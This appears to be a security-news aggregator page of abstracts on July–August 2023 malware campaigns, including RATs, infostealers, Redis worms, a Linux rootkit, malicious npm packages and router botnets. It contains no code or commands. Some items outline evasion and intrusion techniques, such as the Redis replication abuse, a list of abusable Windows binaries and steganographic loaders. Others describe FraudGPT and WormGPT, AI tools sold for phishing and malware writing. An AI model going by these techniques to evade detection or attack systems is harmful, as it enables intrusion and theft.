HiatusRAT Malware Resurfaces: Taiwan Firms and U.S. Military Under Attack Full Text
Abstract
The threat actors behind the HiatusRAT malware have returned from their hiatus with a new wave of reconnaissance and targeting activity aimed at Taiwan-based organizations and a U.S. military procurement system. Besides recompiling malware samples for different architectures, the artifacts are said to have been hosted on new virtual private servers (VPSs), Lumen Black Lotus Labs said in a report published last week. The cybersecurity firm described the activity cluster as "brazen" and "one of the most audacious," indicating no signs of slowing down. The identity and the origin of the threat actors are presently unknown. Targets included commercial firms, such as semiconductor and chemical manufacturers, and at least one municipal government organization in Taiwan as well as a U.S. Department of Defense (DoD) server associated with submitting and retrieving proposals for defense contracts. HiatusRAT was first disclosed by the cybersecurity company in MarchThe Hacker News
August 19, 2023
WoofLocker Toolkit Hides Malicious Codes in Images to Run Tech Support Scams Full Text
Abstract
Cybersecurity researchers have detailed an updated version of an advanced fingerprinting and redirection toolkit called WoofLocker that's engineered to conduct tech support scams. The sophisticated traffic redirection scheme was first documented by Malwarebytes in January 2020, leveraging JavaScript embedded in compromised websites to perform anti-bot and web traffic filtering checks to serve next-stage JavaScript that redirects users to a browser locker (aka browlock). This redirection mechanism, in turn, makes use of steganographic tricks to conceal the JavaScript code within a PNG image that's served only when the validation phase is successful. Should a user be detected as a bot or not interesting traffic, a decoy PNG file without the malicious code is used. WoofLocker is also known as 404Browlock due to the fact that visiting the browlock URL directly without the appropriate redirection or one-time session token results in a 404 error page. The cybersecurity firmThe Hacker News
August 19, 2023
Thousands of Android Malware Apps Using Stealthy APK Compression to Evade Detection Full Text
Abstract
Threat actors are using Android Package (APK) files with unknown or unsupported compression methods to elude malware analysis. That's according to findings from Zimperium, which found 3,300 artifacts leveraging such compression algorithms in the wild. 71 of the identified samples can be loaded on the operating system without any problems. There is no evidence that the apps were available on the Google Play Store at any point in time, indicating that the apps were distributed through other means, typically via untrusted app stores or social engineering to trick the victims into sideloading them. The APK files use "a technique that limits the possibility of decompiling the application for a large number of tools, reducing the possibilities of being analyzed," security researcher Fernando Ortega said. "In order to do that, the APK (which is in essence a ZIP file), is using an unsupported decompression method." The advantage of such an approach is its abilitThe Hacker News
August 19, 2023
Over 3,000 Android Malware spotted using unsupported/unknown compression methods to avoid detection Full Text
Abstract
Threat actors are using Android Package (APK) files with unsupported compression methods to prevent malware analysis. On June 28th, researchers from Zimperium zLab observed that Joe Sandbox announced the availability of an Android APK that...Security Affairs
August 17, 2023
Large-Scale Campaign Delivers Proxy Server App to Make Systems Serve as Residential Exit Nodes Full Text
Abstract
The proxy application is silently installed by malware on infected systems without user knowledge or interaction, and it goes undetected by anti-virus software as it is signed.Cyware
August 15, 2023
QwixxRAT, a new Windows RAT appears in the threat landscape Full Text
Abstract
QwixxRAT is a new Windows remote access trojan (RAT) that is offered for sale through Telegram and Discord platforms. The Uptycs Threat Research team discovered the QwixxRAT (aka Telegram RAT) in early August 2023 while it was advertised through Telegram...Security Affairs
August 15, 2023
New Windows Malware QwixxRAT Appears in the Threat Landscape Full Text
Abstract
According to the experts, QwixxRAT is meticulously designed to steal a broad range of information, including data from browser histories, credit card details, screenshots, and keystrokes.Cyware
August 15, 2023
Gigabud RAT Android Banking Malware Targets Institutions Across Countries Full Text
Abstract
Account holders at numerous financial institutions in Thailand, Indonesia, Vietnam, the Philippines, and Peru are being targeted by an Android banking malware called Gigabud RAT. "One of Gigabud RAT's unique features is that it doesn't execute any malicious actions until the user is authorized into the malicious application by a fraudster, [...] which makes it harder to detect," Group-IB researchers Pavel Naumov and Artem Grischenko said. "Instead of using HTML overlay attacks, Gigabud RAT gathers sensitive information primarily through screen recording." Gigabud RAT was first documented by Cyble in January 2023 after it was spotted impersonating bank and government apps to siphon sensitive data. It's known to be active in the wild since at least July 2022. The Singapore-based company said it also identified a second variant of the malware minus the RAT capabilities. Dubbed Gigabud.Loan, it comes under the guise of a loan application thatThe Hacker News
August 14, 2023
QwixxRAT: New Remote Access Trojan Emerges via Telegram and Discord Full Text
Abstract
A new remote access trojan (RAT) called QwixxRAT is being advertised for sale by its threat actor through Telegram and Discord platforms. "Once installed on the victim's Windows platform machines, the RAT stealthily collects sensitive data, which is then sent to the attacker's Telegram bot, providing them with unauthorized access to the victim's sensitive information," Uptycs said in a new report published today. The cybersecurity company, which discovered the malware earlier this month, said it's "meticulously designed" to harvest web browser histories, bookmarks, cookies, credit card information, keystrokes, screenshots, files matching certain extensions, and data from apps like Steam and Telegram. The tool is offered for 150 rubles for weekly access and 500 rubles for a lifetime license. It also comes in a limited free version. A C#-based binary, QwixxRAT comes with various anti-analysis features to remain covert and evade detection. ThiThe Hacker News
August 14, 2023
New Financial Malware ‘JanelaRAT’ Targets Latin American Users Full Text
Abstract
Users in Latin America (LATAM) are the target of a financial malware called JanelaRAT that's capable of capturing sensitive information from compromised Microsoft Windows systems. "JanelaRAT mainly targets financial and cryptocurrency data from LATAM bank and financial institutions," Zscaler ThreatLabz researchers Gaetano Pellegrino and Sudeep Singh said, adding it "abuses DLL side-loading techniques from legitimate sources (like VMWare and Microsoft) to evade endpoint detection." The exact starting point of the infection chain is unclear, but the cybersecurity company, which discovered the campaign in June 2023, said the unknown vector is used to deliver a ZIP archive file containing a Visual Basic Script. The VBScript is engineered to fetch a second ZIP archive from the attackers' server as well as drop a batch file used to establish persistence of the malware. The ZIP archive is packed with two components, the JanelaRAT payload and a legitimateThe Hacker News
August 12, 2023
MacOS Systems Turned Into Proxy Exit Nodes by Adload Full Text
Abstract
AdLoad malware is still infecting Mac systems and has been observed turning infected systems into a giant proxy botnet. AT&T Alien Labs has identified over 10,000 IPs behaving as proxy exit nodes, indicating a potentially widespread infection.Cyware
August 12, 2023
JanelaRAT: Repurposed BX Rat Variant Targeting LATAM FinTech Full Text
Abstract
Zscaler ThreatLabz has discovered a threat actor targeting FinTech users in the LATAM region with a malware called JanelaRAT. This malware uses tactics such as DLL side-loading and dynamic C2 infrastructure.Cyware
August 10, 2023
Statc Stealer, a new sophisticated info-stealing malware Full Text
Abstract
Experts warn that a new info-stealer named Statc Stealer is infecting Windows devices to steal a broad range of sensitive information. Zscaler ThreatLabz researchers discovered a new information stealer malware, called Statc Stealer, that...Security Affairs
August 10, 2023
New Statc Stealer Malware Emerges: Your Sensitive Data at Risk Full Text
Abstract
A new information-stealing malware strain called Statc Stealer has been found infecting devices running Microsoft Windows to siphon sensitive personal and payment information. "Statc Stealer exhibits a broad range of stealing capabilities, making it a significant threat," Zscaler ThreatLabz researchers Shivam Sharma and Amandeep Kumar said in a technical report published this week. "It can steal sensitive information from various web browsers, including login data, cookies, web data, and preferences. Additionally, it targets cryptocurrency wallets, credentials, passwords, and even data from messaging apps like Telegram." Written in C++, the malicious stealer finds its way into victim systems when potential victims are tricked into clicking on seemingly innocuous ads, with the stealer imitating an MP4 video file format on web browsers like Google Chrome. The first-stage payload, while dropping and executing a decoy PDF installer, also stealthily deploys a downloaderThe Hacker News
August 9, 2023
Balada Injector still at large – new domains discovered Full Text
Abstract
The Balada Injector is still at large and still evading security software by utilizing new domain names and using new obfuscation. During a routine web monitoring operation, we discovered an address that led us down a rabbit hole of WordPress-orientated...Security Affairs
August 08, 2023
QakBot Malware Operators Expand C2 Network with 15 New Servers Full Text
Abstract
The operators associated with the QakBot (aka QBot) malware have set up 15 new command-and-control (C2) servers as of late June 2023. The findings are a continuation of the malware's infrastructure analysis from Team Cymru, and arrive a little over two months after Lumen Black Lotus Labs revealed that 25% of its C2 servers are only active for a single day. "QakBot has a history of taking an extended break each summer before returning sometime in September, with this year's spamming activities ceasing around 22 June 2023," the cybersecurity firm said. "But are the QakBot operators actually on vacation when they aren't spamming, or is this 'break' a time for them to refine and update their infrastructure and tools?" QakBot's C2 network, like in the case of Emotet and IcedID, is characterized by a tiered architecture in which C2 nodes communicate with upstream Tier 2 (T2) C2 nodes hosted on VPS providers geolocated in Russia. A majoThe Hacker News
August 08, 2023
LOLBAS in the Wild: 11 Living-Off-The-Land Binaries Used for Malicious Purposes Full Text
Abstract
Cybersecurity researchers have discovered a set of 11 living-off-the-land binaries-and-scripts (LOLBAS) that could be maliciously abused by threat actors to conduct post-exploitation activities. "LOLBAS is an attack method that uses binaries and scripts that are already part of the system for malicious purposes," Pentera security researcher Nir Chako said. "This makes it hard for security teams to distinguish between legitimate and malicious activities, since they are all performed by trusted system utilities." To that end, the Israeli cybersecurity company said it uncovered nine LOLBAS downloaders and three executors that could enable adversaries to download and execute "more robust malware" on infected hosts. This includes: MsoHtmEd.exe, Mspub.exe, ProtocolHandler.exe, ConfigSecurityPolicy.exe, InstallUtil.exe, Mshta.exe, Presentationhost.exe, Outlook.exe, MSAccess.exe, scp.exe, and sftp.exe. "In a complete attack chain, a hacker will usThe Hacker News
August 8, 2023
Latest Batloader Campaigns Use Pyarmor Pro for Evasion Full Text
Abstract
The Batloader initial access malware, used by the group Water Minyades, has upgraded its evasion techniques by utilizing Pyarmor Pro to obfuscate its malicious Python scripts.Cyware
August 07, 2023
New Malware Campaign Targets Inexperienced Cyber Criminals with OpenBullet Configs Full Text
Abstract
A new malware campaign has been observed making use of malicious OpenBullet configuration files to target inexperienced cyber criminals with the goal of delivering a remote access trojan (RAT) capable of stealing sensitive information. Bot mitigation company Kasada said the activity is designed to "exploit trusted criminal networks," describing it as an instance of advanced threat actors "preying on beginner hackers." OpenBullet is a legitimate open-source pen testing tool used for automating credential stuffing attacks. It takes in a configuration file that's tailored to a specific website and can combine it with a password list procured through other means to log successful attempts. "OpenBullet can be used with Puppeteer, which is a headless browser that can be used for automating web interactions," the company said. "This makes it very easy to launch credential stuffing attacks without having to deal with browser windows popping uThe Hacker News
August 7, 2023
A new sophisticated SkidMap variant targets unsecured Redis servers Full Text
Abstract
A new campaign targets Redis servers; this time the malware employed in the attacks is a new variant of the SkidMap malware. SkidMap is a crypto-miner detected by Trend Micro in September 2019 while it was targeting Linux machines. The malicious...Security Affairs
August 07, 2023
New SkidMap Linux Malware Variant Targeting Vulnerable Redis Servers Full Text
Abstract
Vulnerable Redis services have been targeted by a "new, improved, dangerous" variant of a malware called SkidMap that's engineered to target a wide range of Linux distributions. "The malicious nature of this malware is to adapt to the system on which it is executed," Trustwave security researcher Radoslaw Zdonczyk said in an analysis published last week. Some of the Linux distributions SkidMap sets its eyes on include Alibaba, Anolis, openEuler, EulerOS, Stream, CentOS, RedHat, and Rocky. SkidMap was first disclosed by Trend Micro in September 2019 as a cryptocurrency mining botnet with capabilities to load malicious kernel modules that can obfuscate its activities as well as monitor the miner process. The operators of the malware have also been found camouflaging their backup command-and-control (C2) IP address on the Bitcoin blockchain, evocative of another botnet malware known as Glupteba. "The technique of fetching real-time data from a deThe Hacker News
August 7, 2023
Reptile Rootkit Targets Linux Systems in South Korea Full Text
Abstract
Reptile, an open-source kernel module rootkit designed to target Linux systems, was found on GitHub. Unlike typical rootkit malware, Reptile not only conceals its presence but also offers a reverse shell, granting threat actors control over compromised systems. It is crucial to regularly inspect...Cyware
August 05, 2023
Reptile Rootkit: Advanced Linux Malware Targeting South Korean Systems Full Text
Abstract
Threat actors are using an open-source rootkit called Reptile to target Linux systems in South Korea. "Unlike other rootkit malware that typically only provide concealment capabilities, Reptile goes a step further by offering a reverse shell, allowing threat actors to easily take control of systems," the AhnLab Security Emergency Response Center (ASEC) said in a report published this week. "Port knocking is a method where the malware opens a specific port on an infected system and goes on standby. When the threat actor sends a magic packet to the system, the received packet is used as a basis to establish a connection with the C&C server." A rootkit is a malicious software program that's designed to provide privileged, root-level access to a machine while concealing its presence. At least four different campaigns have leveraged Reptile since 2022. The first use of the rootkit was recorded by Trend Micro in May 2022 in connection with an intrusionThe Hacker News
August 4, 2023
Rilide Stealer Evolves to Target Chrome Extension Manifest V3 Full Text
Abstract
A rather sophisticated version of the Rilide malware was identified targeting Chromium-based web browsers to steal sensitive data and cryptocurrency. Experts identified over 1,300 phishing websites distributing the new version of Rilide Stealer along with other harmful malware such as Bu...Cyware
August 04, 2023
Malicious npm Packages Found Exfiltrating Sensitive Data from Developers Full Text
Abstract
Cybersecurity researchers have discovered a new bunch of malicious packages on the npm package registry that are designed to exfiltrate sensitive developer information. Software supply chain firm Phylum, which first identified the "test" packages on July 31, 2023, said they "demonstrated increasing functionality and refinement," hours after which they were removed and re-uploaded under different, legitimate-sounding package names. While the end goal of the undertaking is not clear, it's suspected to be a highly targeted campaign aimed at the cryptocurrency sector based on references to modules such as "rocketrefer" and "binarium." All the packages were published by the npm user malikrukd4732. A common feature across all the modules is the ability to launch JavaScript ("index.js") that's equipped to exfiltrate valuable information to a remote server. "The index.js code is spawned in a child process by the preinstall.jThe Hacker News
August 4, 2023
Malicious packages in the NPM designed for highly-targeted attacks Full Text
Abstract
Researchers discovered a new set of malicious packages on the npm package manager that can exfiltrate sensitive developer data. On July 31, 2023, Phylum researchers observed the publication of ten different "test" packages on the npm package manager...Security Affairs
August 03, 2023
Malicious Apps Use Sneaky Versioning Technique to Bypass Google Play Store Scanners Full Text
Abstract
Threat actors are leveraging a technique called versioning to evade Google Play Store's malware detections and target Android users. "Campaigns using versioning commonly target users' credentials, data, and finances," Google Cybersecurity Action Team (GCAT) said in its August 2023 Threat Horizons Report shared with The Hacker News. While versioning is not a new phenomenon, it's sneaky and hard to detect. In this method, a developer releases an initial version of an app on the Play Store that passes Google's pre-publication checks, but is later updated with a malware component. This is achieved by pushing an update from an attacker-controlled server to serve malicious code on the end user device using a method called dynamic code loading (DCL), effectively turning the app into a backdoor. Earlier this May, ESET discovered a screen recording app named "iRecorder - Screen Recorder" that remained innocuous for nearly a year after it was firstThe Hacker News
August 03, 2023
New Version of Rilide Data Theft Malware Adapts to Chrome Extension Manifest V3 Full Text
Abstract
Cybersecurity researchers have discovered a new version of malware called Rilide that targets Chromium-based web browsers to steal sensitive data and steal cryptocurrency. "It exhibits a higher level of sophistication through modular design, code obfuscation, adoption to the Chrome Extension Manifest V3, and additional features such as the ability to exfiltrate stolen data to a Telegram channel or interval-based screenshot captures," Trustwave security researcher Pawel Knapczyk said in a report shared with The Hacker News. Rilide was first documented by the cybersecurity company in April 2023, uncovering two different attack chains that made use of Ekipa RAT and Aurora Stealer to deploy rogue browser extensions capable of data and crypto theft. It's sold on dark web forums by an actor named "friezer" for $5,000. The malware is equipped with a wide range of features that allow it to disable other browser add-ons, harvest browsing history and cookies,The Hacker News
August 3, 2023
New Variants of NodeStealer Found Infecting Facebook Business Accounts Full Text
Abstract
Unit 42 researchers discovered a previously unreported phishing campaign targeting Facebook business accounts. The campaign distributed new variants of NodeStealer malware that could fully take over these accounts, steal cryptocurrency, and download further payloads. This type of attack can cause b...Cyware
August 01, 2023
New NodeStealer Targeting Facebook Business Accounts and Crypto Wallets Full Text
Abstract
Cybersecurity researchers have unearthed a Python variant of a stealer malware NodeStealer that's equipped to fully take over Facebook business accounts as well as siphon cryptocurrency. Palo Alto Networks Unit 42 said it detected the previously undocumented strain as part of a campaign that commenced in December 2022. NodeStealer was first exposed by Meta in May 2023, describing it as a stealer capable of harvesting cookies and passwords from web browsers to compromise Facebook, Gmail, and Outlook accounts. While the prior samples were written in JavaScript, the latest versions are coded in Python. "NodeStealer poses great risk for both individuals and organizations," Unit 42 researcher Lior Rochberger said. "Besides the direct impact on Facebook business accounts, which is mainly financial, the malware also steals credentials from browsers, which can be used for further attacks." The attacks start with bogus messages on Facebook that purportedly claiThe Hacker News
August 1, 2023
NodeStealer 2.0 takes over Facebook Business accounts and targets crypto wallets Full Text
Abstract
Researchers spotted a Python variant of the NodeStealer that was designed to take over Facebook business accounts and cryptocurrency wallets. Palo Alto Networks Unit 42 discovered a previously unreported phishing campaign that distributed...Security Affairs
August 1, 2023
WikiLoader malware-as-a-service targets Italian organizations Full Text
Abstract
Threat actors are targeting Italian organizations with a phishing campaign aimed at delivering a new malware called WikiLoader. WikiLoader is a new piece of malware that is employed in a phishing campaign that is targeting Italian organizations....Security Affairs
July 31, 2023
New P2PInfect Worm Targets Redis Servers with Undocumented Breach Methods Full Text
Abstract
The P2PInfect peer-to-peer (P2P) worm has been observed employing previously undocumented initial access methods to breach susceptible Redis servers and rope them into a botnet. "The malware compromises exposed instances of the Redis data store by exploiting the replication feature," Cado Security researchers Nate Bill and Matt Muir said in a report shared with The Hacker News. "A common attack pattern against Redis in cloud environments is to exploit this feature using a malicious instance to enable replication. This is achieved via connecting to an exposed Redis instance and issuing the SLAVEOF command." The Rust-based malware was first documented by Palo Alto Networks Unit 42, calling out the malware's ability to exploit a critical Lua sandbox escape vulnerability (CVE-2022-0543, CVSS score: 10.0) to obtain a foothold into Redis instances. The campaign is believed to have commenced on or after June 29, 2023. However, the latest discovery suggests thThe Hacker News
July 31, 2023
Experts discovered a previously undocumented initial access vector used by P2PInfect worm Full Text
Abstract
Cado Security observed a new variant of the P2PInfect worm that targets Redis servers with a previously undocumented initial access vector. In July, Palo Alto Networks Unit 42 researchers discovered a new peer-to-peer (P2P) worm called P2PInfect that...Security Affairs
July 31, 2023
Fruity Trojan Uses Deceptive Software Installers to Spread Remcos RAT Full Text
Abstract
Threat actors are creating fake websites hosting trojanized software installers to trick unsuspecting users into downloading a downloader malware called Fruity with the goal of installing remote access trojans such as Remcos RAT. "Among the software in question are various instruments for fine-tuning CPUs, graphic cards, and BIOS; PC hardware-monitoring tools; and some other apps," cybersecurity vendor Doctor Web said in an analysis. "Such installers are used as a decoy and contain not only the software potential victims are interested in, but also the trojan itself with all its components." The exact initial access vector used in the campaign is unclear but it could potentially range from phishing to drive-by downloads to malicious ads. Users who land on the fake site are prompted to download a ZIP installer package. The installer, besides activating the standard installation process, stealthily drops the Fruity trojan, a Python-based malware that unpacks an MPThe Hacker News
July 29, 2023
New Android Malware CherryBlos Utilizing OCR to Steal Sensitive Data Full Text
Abstract
A new Android malware strain called CherryBlos has been observed making use of optical character recognition (OCR) techniques to gather sensitive data stored in pictures. CherryBlos, per Trend Micro, is distributed via bogus posts on social media platforms and comes with capabilities to steal cryptocurrency wallet-related credentials and act as a clipper, substituting wallet addresses when a string matching a predefined format is copied to the clipboard. Once installed, the app asks the user to grant it accessibility permissions, which allow it to automatically grant itself additional permissions as required. As a defense evasion measure, users attempting to kill or uninstall the app by entering the Settings app are redirected back to the home screen. Besides displaying fake overlays on top of legitimate crypto wallet apps to steal credentials and make fraudulent fund transfers to an attacker-controlled address, CherryBlos utilizes OCR to recogThe Hacker News
July 29, 2023
Update: More Malicious NPM Packages Found in Wake of Jumpcloud Supply Chain Hack Full Text
Abstract
An investigation by ReversingLabs researchers has uncovered evidence of more malicious npm packages, with links to the same infrastructure that also appear to target cryptocurrency providers.Cyware
July 29, 2023
Now Abyss Locker also targets VMware ESXi servers Full Text
Abstract
A Linux variant of the Abyss Locker designed to target VMware ESXi servers appeared in the threat landscape, experts warn. The operators behind the Abyss Locker developed a Linux variant that targets VMware ESXi servers expanding their potential targets. VMware...Security Affairs
July 28, 2023
IcedID Malware Adapts and Expands Threat with Updated BackConnect Module Full Text
Abstract
The threat actors linked to the malware loader known as IcedID have made updates to the BackConnect (BC) module that's used for post-compromise activity on hacked systems, new findings from Team Cymru reveal. IcedID, also called BokBot, is a strain of malware similar to Emotet and QakBot that started off as a banking trojan in 2017, before switching to the role of an initial access facilitator for other payloads. Recent versions of the malware have been observed removing functionality related to online banking fraud to prioritize ransomware delivery. The BackConnect (BC) module, first documented by Netresec in October 2022, relies on a proprietary command-and-control (C2) protocol to exchange commands between a server and the infected host. The protocol, which comes with a VNC component for remote access, has also been identified in other malware such as the now-discontinued BazarLoader and QakBot. In December 2022, Team Cymru reported the discovery of 11 BC C2s aThe Hacker News
July 28, 2023
Related CherryBlos and FakeTrade Android Malware Involved in Scam Campaigns Full Text
Abstract
The CherryBlos malware steals cryptocurrency wallet credentials and replaces withdrawal addresses, while the FakeTrade malware tricks users into downloading apps that promise increased income but prevent fund withdrawals.Cyware
July 27, 2023
Introducing FraudGPT: The Latest AI Cybercrime Tool in the Dark Web Full Text
Abstract
In the wake of WormGPT's success, threat actors have now introduced another AI-powered cybercrime tool called FraudGPT. This AI bot is being promoted on numerous dark web marketplaces and Telegram channels, and is capable of designing spear-phishing emails, generating cracking tools, and facilit...Cyware
July 27, 2023
Decoy Dog Malware Evolves to Expand its Reach Full Text
Abstract
An unidentified nation-state appears to be preparing for a new hacking campaign, according to researchers at Infoblox. The campaign uses the relatively new Decoy Dog malware toolkit. Decoy Dog has undergone a major upgrade from Pupy, an open-source remote access tool, to disguise its activities...Cyware
July 26, 2023
Decoy Dog: New Breed of Malware Posing Serious Threats to Enterprise Networks Full Text
Abstract
A deeper analysis of a recently discovered malware called Decoy Dog has revealed that it's a significant upgrade over the Pupy RAT, an open-source remote access trojan it's modeled on. "Decoy Dog has a full suite of powerful, previously unknown capabilities – including the ability to move victims to another controller, allowing them to maintain communication with compromised machines and remain hidden for long periods of time," Infoblox said in a Tuesday report. "Some victims have actively communicated with a Decoy Dog server for over a year." Other new features allow the malware to execute arbitrary Java code on the client and connect to emergency controllers using a mechanism that's similar to a traditional DNS domain generation algorithm (DGA), with the Decoy Dog domains engineered to respond to replayed DNS queries from breached clients. The sophisticated toolkit was first discovered by the cybersecurity firm in early April 2023 afterThe Hacker News
July 26, 2023
FraudGPT, a new malicious generative AI tool appears in the threat landscape Full Text
Abstract
FraudGPT is another cybercrime generative artificial intelligence (AI) tool that is advertised in the hacking underground. Generative AI models are becoming attractive to crooks; Netenrich researchers recently spotted a new platform dubbed FraudGPT...Security Affairs
July 26, 2023
New AI Tool ‘FraudGPT’ Emerges, Tailored for Sophisticated Attacks Full Text
Abstract
Following the footsteps of WormGPT, threat actors are advertising yet another cybercrime generative artificial intelligence (AI) tool dubbed FraudGPT on various dark web marketplaces and Telegram channels. "This is an AI bot, exclusively targeted for offensive purposes, such as crafting spear phishing emails, creating cracking tools, carding, etc.," Netenrich security researcher Rakesh Krishnan said in a report published Tuesday. The cybersecurity firm said the offering has been circulating since at least July 22, 2023, for a subscription cost of $200 a month (or $1,000 for six months and $1,700 for a year). "If your [sic] looking for a Chat GPT alternative designed to provide a wide range of exclusive tools, features, and capabilities tailored to anyone's individuals with no boundaries then look no further!," claims the actor, who goes by the online alias CanadianKingpin. The author also states that the tool could be used to write malicious code, cThe Hacker News
July 26, 2023
Rust-based Realst Infostealer Targeting Apple macOS Users’ Cryptocurrency Wallets Full Text
Abstract
A new malware family called Realst has become the latest to target Apple macOS systems, with a third of the samples already designed to infect macOS 14 Sonoma, the upcoming major release of the operating system. Written in the Rust programming language, the malware is distributed in the form of bogus blockchain games and is capable of "emptying crypto wallets and stealing stored password and browser data" from both Windows and macOS machines. Realst was first discovered in the wild by security researcher iamdeadlyz. "Realst Infostealer is distributed via malicious websites advertising fake blockchain games with names such as Brawl Earth, WildWorld, Dawnland, Destruction, Evolion, Pearl, Olymp of Reptiles, and SaintLegend," SentinelOne security researcher Phil Stokes said in a report. "Each version of the fake blockchain game is hosted on its own website complete with associated Twitter and Discord accounts." The cybersecurity firm, which identifThe Hacker News
July 26, 2023
New Realst Info-stealer Targets MacOS, Empties Crypto Wallets Full Text
Abstract
In the ever-evolving information-stealer landscape, a new malware dubbed Realst has emerged. Realst is designed to target macOS systems and is capable of emptying crypto wallets and stealing stored passwords and browser data. Attackers are using tricks to lure gamers with money, which is a red...Cyware
July 25, 2023
Spyhide Stalkerware is Spying on Tens of Thousands of Phones Full Text
Abstract
Spyhide is secretly collecting private data from tens of thousands of Android devices worldwide. The app is often installed on a victim's phone by someone who knows their passcode, and it remains hidden on the home screen.Cyware
July 25, 2023
Casbaneiro Banking Malware Goes Under the Radar with UAC Bypass Technique Full Text
Abstract
The financially motivated threat actors behind the Casbaneiro banking malware family have been observed making use of a User Account Control (UAC) bypass technique to gain full administrative privileges on a machine, a sign that the threat actor is evolving their tactics to avoid detection and execute malicious code on compromised assets. "They are still heavily focused on Latin American financial institutions, but the changes in their techniques represent a significant risk to multi-regional financial organizations as well," Sygnia said in a statement shared with The Hacker News. Casbaneiro, also known as Metamorfo and Ponteiro, is best known for its banking trojan, which first emerged in mass email spam campaigns targeting the Latin American financial sector in 2018. Infection chains typically begin with a phishing email pointing to a booby-trapped attachment that, when launched, activates a series of steps that culminate in the deployment of the banking malwareThe Hacker News
July 21, 2023
HotRat: New Variant of AsyncRAT Malware Spreading Through Pirated Software Full Text
Abstract
A new variant of AsyncRAT malware dubbed HotRat is being distributed via free, pirated versions of popular software and utilities such as video games, image and sound editing software, and Microsoft Office. "HotRat malware equips attackers with a wide array of capabilities, such as stealing login credentials, cryptocurrency wallets, screen capturing, keylogging, installing more malware, and gaining access to or altering clipboard data," Avast security researcher Martina Milánek said. The Czech cybersecurity firm said the trojan has been prevalent in the wild since at least October 2022, with a majority of the infections concentrated in Thailand, Guyana, Libya, Suriname, Mali, Pakistan, Cambodia, South Africa, and India. The attacks entail bundling the cracked software available online via torrent sites with a malicious AutoHotkey (AHK) script that initiates an infection chain designed to deactivate antivirus solutions on the compromised host and ultimately laThe Hacker News
July 21, 2023
HotRat as Hidden Script in Cracked Software Full Text
Abstract
In a recent encounter, security researchers stumbled across a HotRat malware distribution campaign that cybercriminals were offering bundled as cracked programs and games. HotRat is an offshoot of the open-source AsyncRAT framework. Implement strict software policies, regularly update and patch sys...Cyware
July 21, 2023
Sophisticated BundleBot Malware Disguised as Google AI Chatbot and Utilities Full Text
Abstract
A new malware strain known as BundleBot has been stealthily operating under the radar by taking advantage of .NET single-file deployment techniques, enabling threat actors to capture sensitive information from compromised hosts. "BundleBot is abusing the dotnet bundle (single-file), self-contained format that results in very low or no static detection at all," Check Point said in a report published this week, adding it is "commonly distributed via Facebook Ads and compromised accounts leading to websites masquerading as regular program utilities, AI tools, and games." Some of these websites aim to mimic Google Bard, the company's conversational generative artificial intelligence chatbot, enticing victims into downloading a bogus RAR archive ("Google_AI.rar") hosted on legitimate cloud storage services such as Dropbox. The archive file, when unpacked, contains an executable file ("GoogleAI.exe"), which is the .NET single-file, self-conThe Hacker News
July 20, 2023
P2PInfect, a Rusty P2P worm targets Redis Servers on Linux and Windows systems Full Text
Abstract
Cybersecurity researchers discovered a new peer-to-peer (P2P) worm called P2PInfect that targets Redis servers. Palo Alto Networks Unit 42 researchers have discovered a new peer-to-peer (P2P) worm called P2PInfect that targets...Security Affairs
July 20, 2023
New P2PInfect Worm Targeting Redis Servers on Linux and Windows Systems Full Text
Abstract
Cybersecurity researchers have uncovered a new cloud-targeting, peer-to-peer (P2P) worm called P2PInfect that targets vulnerable Redis instances for follow-on exploitation. "P2PInfect exploits Redis servers running on both Linux and Windows Operating Systems making it more scalable and potent than other worms," Palo Alto Networks Unit 42 researchers William Gamazo and Nathaniel Quist said. "This worm is also written in Rust, a highly scalable and cloud-friendly programming language." It's estimated that as many as 934 unique Redis systems may be vulnerable to the threat. The first known instance of P2PInfect was detected on July 11, 2023. A notable characteristic of the worm is its ability to infect vulnerable Redis instances by exploiting a critical Lua sandbox escape vulnerability, CVE-2022-0543 (CVSS score: 10.0), which has been previously exploited to deliver multiple malware families such as Muhstik, Redigo, and HeadCrab over the past yeThe Hacker News
July 17, 2023
Update: Google Removes Swing VPN Android App Exposed as DDoS Botnet Full Text
Abstract
The incident serves as a reminder that even seemingly legitimate apps can harbor dangerous intentions, highlighting the importance of staying informed and vigilant against cyber threats.Cyware
July 17, 2023
New AVrecon Malware Infects 70,000 Linux Routers Across 20 Countries Full Text
Abstract
A stealthy Linux malware, dubbed AVrecon, was found targeting more than 70,000 Linux-based SOHO routers at least since May 2021. It reportedly hijacked these devices to form a botnet that could steal bandwidth and provide a hidden residential proxy service. A total of 15 second-stage control server...Cyware
July 16, 2023
WormGPT, the generative AI tool to launch sophisticated BEC attacks Full Text
Abstract
The WormGPT case: How generative artificial intelligence (AI) can improve the capabilities of cybercriminals and allow them to launch sophisticated attacks. Researchers from SlashNext warn of the dangers related to a new generative AI cybercrime...Security Affairs
July 15, 2023
Meet CustomerLoader: A Multifaceted Malware Unleashing Diverse Payloads Full Text
Abstract
An unreported .NET loader referred to as CustomerLoader is being distributed through deceptive phishing emails, YouTube videos, and web pages that mimic genuine websites. This loader possesses the capability to retrieve, decrypt, and execute additional payloads.Cyware
July 14, 2023
New SOHO Router Botnet AVrecon Spreads to 70,000 Devices Across 20 Countries Full Text
Abstract
A new malware strain has been found covertly targeting small office/home office (SOHO) routers for more than two years, infiltrating over 70,000 devices and creating a botnet with 40,000 nodes spanning 20 countries. Lumen Black Lotus Labs has dubbed the malware AVrecon, making it the third such strain to focus on SOHO routers after ZuoRAT and HiatusRAT over the past year. "This makes AVrecon one of the largest SOHO router-targeting botnets ever seen," the company said. "The purpose of the campaign appears to be the creation of a covert network to quietly enable a range of criminal activities from password spraying to digital advertising fraud." A majority of the infections are located in the U.K. and the U.S., followed by Argentina, Nigeria, Brazil, Italy, Bangladesh, Vietnam, India, Russia, and South Africa, among others. AVrecon was first highlighted by Kaspersky senior security researcher Ye (Seth) Jin in May 2021, indicating that the malware hasThe Hacker News
July 13, 2023
PicassoLoader Malware Used in Ongoing Attacks on Ukraine and Poland Full Text
Abstract
Government entities, military organizations, and civilian users in Ukraine and Poland have been targeted as part of a series of campaigns designed to steal sensitive data and gain persistent remote access to the infected systems. The intrusion set, which stretches from April 2022 to July 2023, leverages phishing lures and decoy documents to deploy a downloader malware called PicassoLoader, which acts as a conduit to launch Cobalt Strike Beacon and njRAT. "The attacks used a multistage infection chain initiated with malicious Microsoft Office documents, most commonly using Microsoft Excel and PowerPoint file formats," Cisco Talos researcher Vanja Svajcer said in a new report. "This was followed by an executable downloader and payload concealed in an image file, likely to make its detection more difficult." Some of the activities have been attributed to a threat actor called GhostWriter (aka UAC-0057 or UNC1151), whose priorities are said to align with the BeThe Hacker News
